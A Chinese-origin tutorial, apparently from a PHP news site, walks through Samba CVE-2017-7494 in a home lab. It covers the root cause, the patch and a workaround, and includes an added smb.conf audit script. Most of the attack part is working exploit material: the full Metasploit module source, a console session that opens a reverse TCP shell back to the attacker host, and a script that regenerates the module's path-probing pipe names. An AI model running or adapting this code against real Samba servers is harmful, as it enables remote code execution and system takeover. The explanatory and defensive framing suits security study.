Samba is the software that implements the SMB protocol on Linux and UNIX systems.
On 24 May 2017 Samba released version 4.6.4, which fixes a critical remote code execution vulnerability, CVE-2017-7494. Every version from Samba 3.5.0 onwards is affected, up to the fixed releases 4.6.4, 4.5.10 and 4.4.14.
360 Network Security Research Lab and the Gear Team of 360's Information Security Department analysed the vulnerability as soon as it was published and confirmed that it is critical and leads to remote code execution.
Vulnerability summary
CVE ID: CVE-2017-7494
Severity: critical
Affected versions: Samba 3.5.0 and later, before the fixed releases 4.6.4 / 4.5.10 / 4.4.14
Description: On 24 May 2017 Samba released version 4.6.4, fixing a critical remote code execution vulnerability that affects every Samba version from 3.5.0 up to the fixed releases 4.6.4, 4.5.10 and 4.4.14.
Technical analysis
As the official advisory describes, all an attacker needs is write access to a Samba share (in this lab, anonymous guest write access); from there they get code execution inside smbd, which runs as root by default. The root cause is in the named-pipe handling of the RPC server: when a client opens a pipe on IPC$ whose name is not one of the built-in pipes, is_known_pipename() treats the name as the name of an RPC module and hands it to the module loader, which dlopen()s it and calls its init entry point. Nothing rejected pipe names containing '/', so a client that has uploaded a shared library to a share and knows that share's path on the server's filesystem can open a "pipe" named after the absolute path of the library and have smbd load it. The fix in 4.6.4 / 4.5.10 / 4.4.14 refuses any pipe name containing '/'. The official workaround for servers that cannot be patched immediately is to add `nt pipe support = no` to the [global] section of smb.conf, at the cost of breaking some functionality for Windows clients.
1. Reproduction environment
Set up two virtual machines, Debian and Kali. Attacker: Kali (192.168.217.162). Target: Debian (192.168.217.150).
2. Install and configure Samba on Debian
1) Install the Samba server:
# apt-get install samba
2) Create a directory to share; here it is /mnt/shared:
# mkdir /mnt/shared
3) Edit the Samba configuration file /etc/samba/smb.conf and append the following share definition. guest ok (and its synonym public) make the share accessible without credentials, and writable lets that guest write to it, which is the precondition the exploit needs:
[shared]
    comment = 'Share for work'
    path = /mnt/shared
    guest ok = yes
    public = yes
    writable = yes
    create mask = 0777
4) Make /mnt/shared writable by the guest account (nobody), matching the create mask above:
# chmod -R 0777 /mnt/shared
5) Restart the Samba service:
# /etc/init.d/samba restart
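The stanza above is deliberately the weak configuration. As an added example (not code from the original article or from Samba), the following Ruby script reads an smb.conf and reports the two things CVE-2017-7494 needs on an unpatched server: a share the client can write to, and named-pipe support still enabled (the official workaround is `nt pipe support = no` in [global]). WEAK_CONF is the share definition from the walkthrough wrapped in a constructed [global] section; HARDENED_CONF is the same share with the workaround applied and guest writes removed. Parameter synonyms and defaults follow the smb.conf documentation, simplified to "a writable key wins over read only" rather than Samba's last-one-wins rule.

```ruby
# Added example (not from the original article): audit an smb.conf for the
# preconditions of CVE-2017-7494 on an unpatched smbd. Both configs below are
# constructed for the demo.

WEAK_CONF = <<~CONF
  [global]
     workgroup = WORKGROUP
  [shared]
     comment = 'Share for work'
     path = /mnt/shared
     guest ok = yes
     public = yes
     writable = yes
     create mask = 0777
CONF

HARDENED_CONF = <<~CONF
  [global]
     workgroup = WORKGROUP
     ; official workaround until smbd is patched (breaks some Windows clients)
     nt pipe support = no
  [shared]
     comment = 'Share for work'
     path = /mnt/shared
     guest ok = no
     read only = yes
CONF

# Minimal smb.conf reader: { "section" => { "parameter" => "value" } }.
# Parameter names are case- and whitespace-insensitive in Samba, so they are
# normalised to lower case with single spaces. Only whole-line comments
# (; or #) are stripped, which is how smbd treats them.
def parse_smb_conf(text)
  conf = Hash.new { |h, k| h[k] = {} }
  section = 'global'
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(';', '#')
    if (m = line.match(/\A\[(.+)\]\z/))
      section = m[1].strip.downcase
      conf[section]
      next
    end
    key, value = line.split('=', 2)
    next if value.nil?
    conf[section][key.strip.downcase.gsub(/\s+/, ' ')] = value.strip
  end
  conf
end

# Samba booleans: yes/true/1 are true, everything else false.
def truthy?(value)
  %w[yes true 1].include?(value.to_s.strip.downcase)
end

# "writable", "writeable" and "write ok" are synonyms; "read only" is the
# inverse and defaults to yes, so a share that says nothing is read-only.
def writable?(share)
  %w[writable writeable write\ ok].each do |k|
    return truthy?(share[k]) if share.key?(k)
  end
  return !truthy?(share['read only']) if share.key?('read only')
  false
end

# "public" is a synonym of "guest ok"; the default is no.
def guest_ok?(share)
  truthy?(share['guest ok'] || share['public'])
end

# Returns the list of findings; empty means nothing is exposed.
def audit_smb_conf(text)
  conf = parse_smb_conf(text)
  findings = []
  global = conf['global']
  if !global.key?('nt pipe support') || truthy?(global['nt pipe support'])
    findings << 'global: nt pipe support is on; an unpatched smbd will ' \
                'dlopen() any pipe name that is a filesystem path'
  end
  conf.each do |name, share|
    next if name == 'global' || !writable?(share)
    who  = guest_ok?(share) ? 'anonymous guests' : 'authenticated users'
    path = share['path'] || share['directory'] || '(unset)'
    findings << "#{name}: writable by #{who}, server path #{path}"
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  puts 'weak:'
  audit_smb_conf(WEAK_CONF).each { |f| puts "  #{f}" }
  puts "hardened: #{audit_smb_conf(HARDENED_CONF).inspect}"
end
```

Run it against /etc/samba/smb.conf on the target (`audit_smb_conf(File.read('/etc/samba/smb.conf'))`) before and after applying the workaround. A writable share that is only reachable with credentials is still a finding: the Metasploit module's description says valid credentials plus a writable folder are enough, guest access just makes it automatic.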
3. Set up the attacker (Kali)
Open a terminal on Kali, go to the linux folder under Metasploit's exploits directory, create an smb folder inside it and download the exploit module into that folder:
# cd /usr/share/metasploit-framework/modules/exploits/linux
# mkdir smb && cd smb
# wget
Run Metasploit and start the attack. I renamed the module file to cve-2017-7494.rb, which is why it is loaded as exploit/linux/smb/cve-2017-7494: Metasploit derives the module path from the file's location and name.
# msfconsole
msf > use exploit/linux/smb/cve-2017-7494
msf exploit(cve-2017-7494) > set rhost 192.168.217.150
rhost => 192.168.217.150
msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(cve-2017-7494) > set lhost 192.168.217.162
lhost => 192.168.217.162
msf exploit(cve-2017-7494) > run

[*] Started reverse TCP handler on 192.168.217.162:4444
[*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path
[*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so
[*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...
[*] Sending stage (38 bytes) to 192.168.217.150
[*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:6e:9a:4a
          inet addr:192.168.217.150  Bcast:192.168.217.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6769 errors:0 dropped:0 overruns:0 frame:0
          TX packets:700 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:479898 (468.6 KiB)  TX bytes:102796 (100.3 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:35 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3557 (3.4 KiB)  TX bytes:3557 (3.4 KiB)
whoami
nobody

Two things in this output are worth reading carefully. The "Trying location" lines are the module guessing the server-side path of the share: the uploaded library is only loaded once a pipe name equal to its absolute path on the server (/mnt/shared/WzyvkESS.so here) is opened on IPC$, and each guess is one such open. If the path is known, setting SMB_SHARE_BASE skips the guessing. Second, the shell runs as nobody rather than root: the share allows guest access, so the forked smbd child handling this connection had already switched its real and effective uid to the guest account before the library was loaded. The gid=0(root) in the id output shows that the child started as root; Samba keeps the saved set-user-ID at 0 so that it can switch back later, which is why public shared-library payloads for this bug call setresuid(0,0,0) in their init routine to regain root. The stock Metasploit ELF-SO payload used here does not do that, so the session has the privileges of the connecting user.
PoC (the Metasploit module):
##
# This module requires Metasploit:
# Current source:
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Samba is_known_pipename() Arbitrary Module Load',
      'Description'    => %q{
        This module triggers an arbitrary shared library load vulnerability
        in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
        requires valid credentials, a writeable folder in an accessible share,
        and knowledge of the server-side path of the writeable folder. In
        some cases, anonymous access combined with common filesystem locations
        can be used to automatically exploit this vulnerability.
      },
      'Author'         =>
        [
          'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery
          'hdm',                               # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-7494' ],
          [ 'URL', '' ],
        ],
      'Payload'        =>
        {
          'Space'       => 9000,
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      #
      # Targets are currently limited by platforms with ELF-SO payload wrappers
      #
      'Targets'        =>
        [
          [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],
          [ 'Linux x86',      { 'Arch' => ARCH_X86 } ],
          [ 'Linux x86_64',   { 'Arch' => ARCH_X64 } ],
          # [ 'Linux MIPS',     { 'Arch' => MIPS } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Mar 24 2017',
      'DefaultTarget'  => 2))

    register_options(
      [
        OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),
        OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),
        OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),
      ])
  end

  def generate_common_locations
    candidates = []
    if datastore['SMB_SHARE_BASE'].to_s.length > 0
      candidates << datastore['SMB_SHARE_BASE']
    end

    %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name|
      candidates << base_name
      candidates << [base_name, @share]
      candidates << [base_name, @share.downcase]
      candidates << [base_name, @share.upcase]
      candidates << [base_name, @share.capitalize]
      candidates << [base_name, @share.gsub(" ", "_")]
    end

    candidates.uniq
  end

  def enumerate_directories(share)
    begin
      self.simple.connect("\\\\#{rhost}\\#{share}")
      stuff = self.simple.client.find_first("\\*")
      directories = [""]
      stuff.each_pair do |entry,entry_attr|
        next if %W{. ..}.include?(entry)
        next unless entry_attr['type'] == 'D'
        directories << entry
      end
      return directories
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("Enum #{share}: #{e}")
      return nil

    ensure
      if self.simple.shares["\\\\#{rhost}\\#{share}"]
        self.simple.disconnect("\\\\#{rhost}\\#{share}")
      end
    end
  end

  def verify_writeable_directory(share, directory="")
    begin
      self.simple.connect("\\\\#{rhost}\\#{share}")

      random_filename = Rex::Text.rand_text_alpha(5)+".txt"
      filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}"

      wfd = simple.open(filename, 'rwct')
      wfd << Rex::Text.rand_text_alpha(8)
      wfd.close
      simple.delete(filename)
      return true
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("Write #{share}#(unknown): #{e}")
      return false

    ensure
      if self.simple.shares["\\\\#{rhost}\\#{share}"]
        self.simple.disconnect("\\\\#{rhost}\\#{share}")
      end
    end
  end

  def share_type(val)
    [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]
  end

  def enumerate_shares_lanman
    shares = []
    begin
      res = self.simple.client.trans(
        "\\PIPE\\LANMAN",
        (
          [0x00].pack('v') +
          "WrLeh\x00" +
          "B13BWz\x00" +
          [0x01, 65406].pack("vv")
        ))
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("Could not enumerate shares via LANMAN")
      return []
    end
    if res.nil?
      vprint_error("Could not enumerate shares via LANMAN")
      return []
    end

    lerror, lconv, lentries, lcount = res['Payload'].to_s[
      res['Payload'].v['ParamOffset'],
      res['Payload'].v['ParamCount']
    ].unpack("v4")

    data = res['Payload'].to_s[
      res['Payload'].v['DataOffset'],
      res['Payload'].v['DataCount']
    ]

    0.upto(lentries - 1) do |i|
      sname,tmp = data[(i * 20) + 0, 14].split("\x00")
      stype = data[(i * 20) + 14, 2].unpack('v')[0]
      scoff = data[(i * 20) + 16, 2].unpack('v')[0]
      scoff -= lconv if lconv != 0
      scomm,tmp = data[scoff, data.length - scoff].split("\x00")
      shares << [ sname, share_type(stype), scomm]
    end
    shares
  end

  def probe_module_path(path)
    begin
      simple.create_pipe(path)
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("Probe: #{path}: #{e}")
    end
  end

  def find_writeable_path(share)
    subdirs = enumerate_directories(share)
    return unless subdirs

    if datastore['SMB_FOLDER'].to_s.length > 0
      subdirs.unshift(datastore['SMB_FOLDER'])
    end

    subdirs.each do |subdir|
      next unless verify_writeable_directory(share, subdir)
      return subdir
    end

    nil
  end

  def find_writeable_share_path
    @path = nil
    share_info = enumerate_shares_lanman
    if datastore['SMB_SHARE_NAME'].to_s.length > 0
      share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']
    end

    share_info.each do |share|
      next if share.first.upcase == 'IPC$'
      found = find_writeable_path(share.first)
      next unless found
      @share = share.first
      @path = found
      break
    end
  end

  def find_writeable
    find_writeable_share_path
    unless @share && @path
      print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
      fail_with(Failure::NoTarget, "No matching target")
    end
    print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
  end

  def upload_payload
    begin
      self.simple.connect("\\\\#{rhost}\\#{@share}")

      random_filename = Rex::Text.rand_text_alpha(8)+".so"
      filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"
      wfd = simple.open(filename, 'rwct')
      wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform})
      wfd.close

      @payload_name = random_filename
      return true

    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      print_error("Write #{@share}#(unknown): #{e}")
      return false

    ensure
      if self.simple.shares["\\\\#{rhost}\\#{@share}"]
        self.simple.disconnect("\\\\#{rhost}\\#{@share}")
      end
    end
  end

  def find_payload
    print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")

    # Reconnect to IPC$
    simple.connect("\\\\#{rhost}\\IPC$")

    #
    # In a perfect world we would find a way make IPC$'s associated CWD
    # change to our share path, which would allow the following code:
    #
    # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")
    #

    # Until we find a better way, brute force based on common paths
    generate_common_locations.each do |location|
      target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')
      print_status("Trying location #{target}...")
      probe_module_path(target)
    end
  end

  def exploit
    # Setup SMB
    connect
    smb_login

    # Find a writeable share
    find_writeable

    # Upload the shared library payload
    upload_payload

    # Find and execute the payload from the share
    find_payload rescue Rex::StreamClosedError

    # Shutdown
    disconnect
  end

end
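Two steps of the module are easier to follow when run offline on known input: enumerate_shares_lanman, which decodes the LANMAN NetShareEnum (RAP) reply that the share names come from, and generate_common_locations plus find_payload, which turn a share name into the list of "pipe" names opened on IPC$. The Ruby below is an added example, not part of the original article or of the Metasploit module; it re-implements those steps stand-alone with a constructed RAP reply for the lab server (the "shared" share and IPC$, with made-up comments) and the payload file name from the console output above. Each string it produces is a server-side filesystem path, which is exactly what an unpatched is_known_pipename() hands to the module loader.

```ruby
# Added example (not from the article or the Metasploit module): the module's
# share enumeration and path guessing, run on constructed data.

SHARE_TYPES = %w[DISK PRINTER DEVICE IPC SPECIAL TEMPORARY].freeze

COMMON_BASES = %w[/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media
                  /mnt/media /var/samba /tmp /home /home/shared].freeze

# params: RAP parameter block = error, converter, entries returned, entries
#         available (four little-endian 16-bit words).
# data:   RAP data block = 20-byte share_info_1 entries (13-byte name + NUL,
#         16-bit type, 32-bit comment pointer) followed by the comment strings.
#         The low word of each pointer, minus the converter, is an offset
#         into the data block.
def parse_share_enum(params, data)
  error, converter, entries, _available = params.unpack('v4')
  raise "RAP error #{error}" unless error.zero?
  Array.new(entries) do |i|
    entry   = data[i * 20, 20]
    name    = entry[0, 14].split("\x00").first.to_s
    type    = entry[14, 2].unpack1('v')
    offset  = entry[16, 2].unpack1('v')
    offset -= converter unless converter.zero?
    comment = data[offset, data.bytesize - offset].split("\x00").first.to_s
    [name, SHARE_TYPES[type] || "UNKNOWN(#{type})", comment]
  end
end

# Constructed reply for the lab server: the guest-writable "shared" share
# plus IPC$, laid out the way a server sends it (entries, then comments).
def constructed_share_enum_reply
  shares   = [['shared', 0, 'Share for work'], ['IPC$', 3, 'IPC Service']]
  entries  = ''.b
  comments = ''.b
  base = shares.size * 20
  shares.each do |name, type, comment|
    entries  << name.ljust(14, "\x00") << [type].pack('v')
    entries  << [base + comments.bytesize, 0].pack('vv')   # offset, segment
    comments << comment << "\x00"
  end
  [[0, 0, shares.size, shares.size].pack('v4'), entries + comments]
end

# The module skips IPC$ and tries a test write in every other share.
def writable_candidates(shares)
  shares.reject { |name, _type, _comment| name.casecmp('IPC$').zero? }
end

# Same guessing strategy as generate_common_locations: every common base,
# alone and joined with case variants of the share name; an operator-supplied
# base (SMB_SHARE_BASE) is tried first.
def common_locations(share, known_base = nil)
  out = []
  out << known_base if known_base && !known_base.empty?
  COMMON_BASES.each do |b|
    out << b
    [share, share.downcase, share.upcase, share.capitalize, share.tr(' ', '_')].each do |v|
      out << "#{b}/#{v}"
    end
  end
  out.uniq
end

# The exact strings sent as pipe names in NT Create AndX on IPC$, one per
# "Trying location" line in the console output.
def probe_targets(share, folder, payload_name, known_base = nil)
  common_locations(share, known_base).map do |loc|
    [loc, folder, payload_name].join('/').squeeze('/')
  end
end

if __FILE__ == $PROGRAM_NAME
  params, data = constructed_share_enum_reply
  shares = parse_share_enum(params, data)
  shares.each { |s| puts s.join(' | ') }
  share = writable_candidates(shares).first.first
  probe_targets(share, '', 'WzyvkESS.so').each { |t| puts "Trying location #{t}..." }
end
```

The first four targets for the lab share come out as /volume1/WzyvkESS.so, /volume1/shared/..., /volume1/SHARED/... and /volume1/Shared/..., matching the console output (the lower-case and underscore variants collapse into the first under uniq). Passing a known base, as SMB_SHARE_BASE does, puts the right path first and avoids the other probes, which is also what a defender sees in a capture: a burst of NT Create AndX requests on IPC$ whose file names contain '/'.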
The above is the full content of this worked example of the Samba remote code execution vulnerability. For more, see the other related articles on PHP中文网.